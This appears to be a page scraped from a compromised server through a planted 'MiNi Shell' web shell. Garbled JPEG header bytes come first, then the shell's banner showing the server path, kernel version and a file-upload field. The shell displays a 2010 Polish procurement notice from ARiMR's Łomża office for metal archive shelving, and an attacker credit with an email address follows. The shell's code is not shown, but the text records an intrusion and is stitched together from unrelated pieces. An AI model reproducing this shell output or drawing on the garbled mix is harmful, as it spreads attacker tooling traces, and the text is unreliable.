JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100517/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100517/132352-N-2010.html

<p class="kh_header"><b>Łomża: Dostawa metalowych regałów przesuwnych i regałów metalowych stałych na potrzeby Podlaskiego OR ARiMR</b><br>
<b>Numer ogłoszenia: 132352 - 2010; data zamieszczenia: 17.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Podlaski Oddział Regionalny Agencji Restrukturyzacji i Modernizacji Rolnictwa , ul. Nowa 2, 18-400 Łomża, woj. podlaskie, tel. 086 2156314, faks 086 2164513.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.arimr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa metalowych regałów przesuwnych i regałów metalowych stałych na potrzeby Podlaskiego OR ARiMR.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa metalowych regałów przesuwnych i regałów metalowych stałych na potrzeby Podlaskiego OR ARiMR (zgodnie ze Wspólnym Słownikiem Zamówień CPV 39132400-0 Systemy kołowe, 39141100-3 Regały) wg poniższego opisu:
1)	lokalizacje, wymiary regałów, ilości regałów, ilości półek, długość regałów oraz łączną długość regałów zawiera tabela nr 1:
Lokalizacja (adres)	Regał przesuwny
dwustronny	Regał przesuwny
dwustronny	Regał stały
jednostronny	Wysokość regałów w danej lokalizacji (cm)	Długość regałów (mb)
	Wymiary regału*
(cm)	Ilość regałów (szt.)
	Ilość półek (szt.)	Wymiary
regału*
(cm)	Ilość regałów (szt.)
	Ilość półek	Wymiary regału*
(cm)	Ilość regałów (szt.)
	Ilość półek (szt.)		
Biuro Powiatowe w Augustowie
ul. Przemysłowa 6
16-300 Augustów	60×35×368	6	5+(1)**	30×35×368-jedna strona regału
30×35×353-druga strona regału	1	5+(1)**	30×35×353	1	5+(1)**	około 175	274,50
Biuro Powiatowe w Białymstoku
ul. Lipowa 32a
15-427 Białystok	60×35×440	11	5+(1)**	-	-	-	-	-	-	około 175	
484,00

Biuro Powiatowe w Bielsku Podlaskim
ul. Białowieska 113D
17-100 Bielsk Podlaski	60×35×260	9	6+(1)**	-	-	-	-	-	-	około 210	
280,80

Biuro Powiatowe w Sejnach
ul. Zawadzkiego 3
16-500 Sejny	60×35×400	7	7+(1)**	-	-	-	-	-	-	około 245	
392,00

Biuro Powiatowe w Wysokiem Mazowieckiem
ul. Ludowa 7
18-200 Wysokie Mazowieckie	60×35×295	5	5+(1)**	60×35×230
60×35×190	4
1	5+(1)**	30×35×295
30×35×190	1
1	5+(1)**	około 175	
282,75

Łączna długość regałów (mb)	1714,05
* - wszystkie wymiary w tabeli nr 1 podane są w centymetrach (cm) w układzie głębokość × wysokość (rozumiana jako odległość między półkami) × długość, odległość między półkami 35 cm (+/- 1 cm) w prześwicie,
** - zapisem +(1) Zamawiający oznaczył półkę wieńczącą;
2)	pomiary regałów zostały dokonane przez Zamawiającego w oparciu o załączone rysunki stanowiące Załączniki od nr 1 do nr 5 do Specyfikacji; Zamawiający wymaga, aby regały były wykonane przez Wykonawcę z maksymalnym wykorzystaniem wielkości powierzchni, do tego przeznaczonej, z uwzględnieniem łatwego dostępu do gromadzonych akt i rozmieszczone wg załączonych rysunków,
3)	opis regałów:
a)	wykonane ze stali,
b)	ściany boczne pełne (w przekroju prostokąt),
c)	malowane proszkowo na kolor jasno-szary,
d)	wyposażone w półki o nośności minimum 100 kg/mb; Zamawiający wymaga aby regały były wyposażone w tabliczki znamionowe z informacją o maksymalnym obciążeniu regału,
e)	półki mocowane na zaczepach (każda półka na czterech niezależnych zaczepach) z płynną regulacją, co 2 cm lub mniejszą, na całej wysokości; otwory w ramie oraz konstrukcja zaczepów muszą wykluczać przypadkowe wypadanie zaczepów z otworów (np. przy wyjmowaniu półki); Konstrukcja zaczepów winna zapewniać swobodną zmianę położenia półek, bez użycia jakichkolwiek narzędzi,
f)	każda podwójna półka powinna być wyposażona w listwy zapółkowe, które uniemożliwią przesunięcie się dokumentów na sąsiednią półkę, wzdłuż dłuższej jej krawędzi,
g)	krawędzie półki powinny być dodatkowo od spodu połączone ze sobą poprzez trwałe zgięcie lub zastosowanie zgrzewów punktowych,
h)	ściana czołowa wyposażona w szyldy do numeracji i oznaczenia zawartości regału,
i)	odległość między półkami 35 cm (+/- 1 cm) w prześwicie,
j)	grubość półki 2,5-3 cm (profil), półka wykonana z blachy stalowej grubości min. 0,7 mm profilowanej, malowanej proszkowo (farbą piecową), dłuższa krawędź półki powinna być wygięta co najmniej trzykrotnie, a krótsza krawędź półki co najmniej dwukrotnie pod kątem prostym, zagięte krawędzie półek (krótsze i dłuższe) muszą być połączone na zasadach zaczepu (nie nitowane i nie spawane) w celu uniknięcia rozgięcia półki pod obciążeniem,
k)	wszystkie regały przesuwne zaopatrzone w odboje zabezpieczające przed przypadkowym przygnieceniem ręki podczas przesuwania oraz blokady uniemożliwiające przewrócenie się regału,
l)	wszystkie regały zakończone półką wieńczącą,
m)	regały jednostronne stałe mocowane do podłoża i ścian za pomocą zaczepów lub śrub,
4)	konstrukcja i technologia wykonania torów jezdnych:
Tory mają być wykonane z materiału jednorodnego, właściwie zabezpieczonego antykorozyjnie (poprzez ocynkowanie w przypadku torów stalowych) oraz przed uszkodzeniami mechanicznymi i stanowiącego jednolity profil - stopy metali, na stałe przytwierdzone do podłoża i wypoziomowane tak, aby nie powodowały samoczynnego przemieszczania się regałów (nie dopuszcza się stosowania łańcuchów napędowych biegnących wzdłuż toru jezdnego), ułożone na istniejącej podłodze (gres), w systemie nawierzchniowym, mocowane kołkami rozporowymi. Na torach jezdnych mają być przymocowane ograniczniki przesuwu uniemożliwiające przemieszczanie regałów poza ustaloną linię krańcową,
5)	konstrukcja i technologia wykonania napędu:
Mechanizm napędowy ręczny pozwalający na lekkie przesuwanie całej grupy regałów jednocześnie, składający się z korby i cichobieżnej przekładni łańcuchowej, nie wymagającej smarowania. Korba (trójramienne pokrętło umieszczone na wysokości ok. 100 cm, długość ramienia korby ok. 20 cm) powinna być wykonana zgodnie z zasadami ergonomii. Uchwyt do kręcenia korby obracany wokół własnej osi. Korba powinna być wyposażona w blokadę przesuwu, umieszczoną w jej środku, uniemożliwiającą samoczynne przesuwanie się regałów. Maksymalna siła potrzebna do przesunięcia regału 5 (+/- 0,5) kg. Mechanizm przenoszący napęd z korby na układ jezdny umieszczony w panelu frontowym. System powinien gwarantować równomierne przemieszczanie się regałów po torach niezależnie od stopnia obciążenia. 
6)	konstrukcja podwozia regałów:
Podwozie regałów ma być wykonane z profilu stalowego, zapewniającego odpowiednią sztywność oraz trwałość. Do podwozia powinny być zainstalowane koła jezdne wykonane ze stopów metali, zabezpieczone antykorozyjnie. Podwozie regałów wyposażone powinno być w system napędu centralnego, w celu eliminacji przekaszania się regałów. Do podwozia muszą być zamontowane odboje dystansowe, zabezpieczające przed uszkodzeniem ciała pracownika. Wszystkie elementy obrotowe łożyskowane na kulkowych łożyskach tocznych obustronnie krytych. Podwozia regałów lakierowane proszkowo. Koła muszą być osadzone na cichobieżnych bezobsługowych szczelnych łożyskach i trzpieniu przykręconym trwale do ramy, zapewniając prowadzenie regału po torach i zabezpieczając regał przed spadnięciem z torów.
7)	dane dotyczące bezpieczeństwa:
Całość konstrukcji, zarówno regałów jak i torów jezdnych musi zapewniać stabilność oraz pełne bezpieczeństwo pracy. Między regałami muszą znajdować się odboje gumowe, uniemożliwiające po całkowitym zsunięciu regałów, uszkodzenie ciała pracownika obsługującego regały. Wszystkie elementy zewnętrzne regałów, półek, ścian, osłon muszą być pozbawione ostrych krawędzi.
Regały muszą być wyposażone w blokadę przesuwu regału umożliwiającą zablokowanie regału w każdej chwili.
2.	Opis pomieszczeń-składnic akt, w których mają być zamontowane regały:
a)	Biuro Powiatowe w Augustowie:
Pomieszczenie o powierzchni około 50,50 m2 o wymiarach: długość około 9,70 m, szerokość około 5,35 m, wysokość 2,76 m (podciąg wys.0,38 m). Pod zabudowę regałów przewidziana jest powierzchnia o wymiarach: 4,63 m x 3,68 m, 0,60 m x 3,53 m (na długości 60 cm jest uskok o wymiarach 0,15 m × 0,60 m), wysokość maks. 2,28 m. Łączna powierzchnia pod zabudowę wynosi 19,16 m2. Lokal znajduje się w piwnicy budynku. Pomieszczenie jest bez okien, w okresie utrzymywania się niskich temperatur powietrza, ogrzewane jest grzejnikami centralnego ogrzewania. W pozostałym okresie jest nieogrzewane. Podłoga w pomieszczeniu wykonana jest z gresu.
b)	Biuro Powiatowe w Białymstoku:
Pomieszczenie o powierzchni: 42,28 m2, o wymiarach: długość 7,66 m, szerokość 5,52 m, wysokość 2,40 m). Pod zabudowę regałów przewidziana jest powierzchnia o wymiarach: 7,50 m x 4,40 m, wysokość maks. 2,20 m. Łączna powierzchnia pod zabudowę wynosi 33,00 m2. Lokal znajduje się w piwnicy budynku. Pomieszczenie jest bez okien, w okresie utrzymywania się niskich temperatur powietrza, ogrzewane jest grzejnikami centralnego ogrzewania. W pozostałym okresie jest nieogrzewane. Podłoga w pomieszczeniu wykonana jest z gresu.
c)	Biuro Powiatowe w Bielsku Podlaskim:
Pomieszczenie o powierzchni: 26,81 m2, składa się z dwóch części: I część o powierzchni - 14,03 m2, II część - o powierzchni - 12,78 m2, wysokość - 2,90 m. Pod zabudowę regałów przewidziana jest powierzchnia o wymiarach: 6,25 m x 2,60 m, wysokość maks. 2,60, (tj. 16,25 m2). Pomieszczenie znajduje się na parterze budynku. Posiada trzy okna, na których są zamontowane metalowe rolety zwijane w kasetonach. Podłoga w pomieszczeniu wykonana jest z gresu.
d)	Biuro Powiatowe w Sejnach:
Pomieszczenie o powierzchni 33,35 m2 o wymiarach: długość 5,99 m, szerokość 6,08 m - wymiary maksymalne, wysokość 3,30 m). Pod zabudowę regałów przewidziana jest powierzchnia o wymiarach: 4,00m x 5,00 m, wysokość maks. 3,00 m, (tj.: 20,00 m2). Posiada trzy okna. Pomieszczenie znajduje się na parterze budynku. Podłoga w pomieszczeniu wykonana jest z gresu.
e)	Biuro Powiatowe w Wysokiem Mazowieckiem:
Pomieszczenie o powierzchni: 28,83 m2 o wymiarach: długość: 4,20 m, szerokość: 3,11 m oraz długość: 4,20 m, szerokość: 3,55 m (przesunięcie ściany w jednej części pomieszczenia), wysokość 2,20 m. Pod zabudowę regałów przewidziana jest powierzchnia o wymiarach: 2,95 m x 4,00 m, 2,30 m x 3,10 m oraz 0,90 m x 1,90 m, wysokość maks. 2,00 m, tj.: 20,64 m2. Pomieszczenie znajduje się w piwnicy budynku, budynek posiada dwa okna. W okresie utrzymywania się niskich temperatur powietrza, ogrzewane jest grzejnikami centralnego ogrzewania. Podłoga w pomieszczeniu wykonana jest z gresu.
3.	Warunki wykonania zamówienia:
a)	przed złożeniem oferty Wykonawca zobowiązany będzie do dokonania oględzin pomieszczeń składnic akt i dokonania pomiarów powierzchni przeznaczonych pod zabudowę w celu prawidłowego wyliczenia łącznej długości regałów, sporządzenia oferty (wpisania wymierzonej łącznej ilości metrów bieżących regałów w kolumnie C Formularza Ofertowego) i wykonania przedmiotu umowy. Skutki rezygnacji z dokonania oględzin pomieszczeń składnic akt obciążają Wykonawcę. W takim przypadku Wykonawcy nie przysługuje żadne roszczenie. W efekcie rezygnacji z dokonania oględzin pomieszczeń składnic akt, Wykonawca będzie zobowiązany do pozostawienia kolumny C Formularza Ofertowego nie wypełnionej, a Zamawiający przyjmie jako ostateczną wyliczoną przez siebie łączną ilość metrów bieżących regałów (wskazaną w kolumnie B Formularza Ofertowego - 1714,05 mb),
b)	Wykonawca będzie zobowiązany do opracowania aranżacji rozmieszczenia regałów w pomieszczeniach opisanych w punkcie 2 niniejszego rozdziału Specyfikacji,
c)	Zamawiający wymaga dostarczenia, wniesienia i montażu zamówionych metalowych regałów przesuwnych i regałów metalowych stałych oraz torów jezdnych do lokalizacji wskazanych w tabeli nr 1, w godzinach 8.15-16.00 - na koszt i ryzyko Wykonawcy,
d)	Jeżeli podczas montażu regałów zaistnieje konieczność przeniesienia  lamp oświetleniowych utrudniających montaż lub ruch regałów , Wykonawca zobowiązany będzie do ich przeniesienia po uzyskaniu zgody Zamawiającego.
4.	Gwarancja:
Zamawiający wymaga od Wykonawcy udzielenia minimum 5 lat gwarancji na wykonany przedmiot zamówienia (liczone od daty protokolarnego odbioru regałów)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.13.24.00-0, 39.14.11.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od Wykonawców wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania przez Wykonawcę warunków udziału w postępowaniu na podstawie analizy przedłożonych przez Wykonawcę oświadczeń i dokumentówwg formuły spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania przez Wykonawcę warunków udziału w postępowaniu na podstawie analizy przedłożonych przez Wykonawcę oświadczeń i dokumentówwg formuły spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania przez Wykonawcę warunków udziału w postępowaniu na podstawie analizy przedłożonych przez Wykonawcę oświadczeń i dokumentówwg formuły spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania przez Wykonawcę warunków udziału w postępowaniu na podstawie analizy przedłożonych przez Wykonawcę oświadczeń i dokumentówwg formuły spełnia-nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zamawiający nie wymaga przedłożenia innych niż wymienione w pkt III.4) albo III.5) dokumentów</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.arimr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Agencja Restrukturyzacji i Modernizacji Rolnictwa Podlaski Oddział Regionalny w Łomży, ul. Nowa 2, 18-400 Łomża.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.05.2010 godzina 09:30, miejsce: Agencja Restrukturyzacji i Modernizacji Rolnictwa Podlaski Oddział Regionalny w Łomży, ul. Nowa 2, 18-400 Łomża, pokój 109 lub 112.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com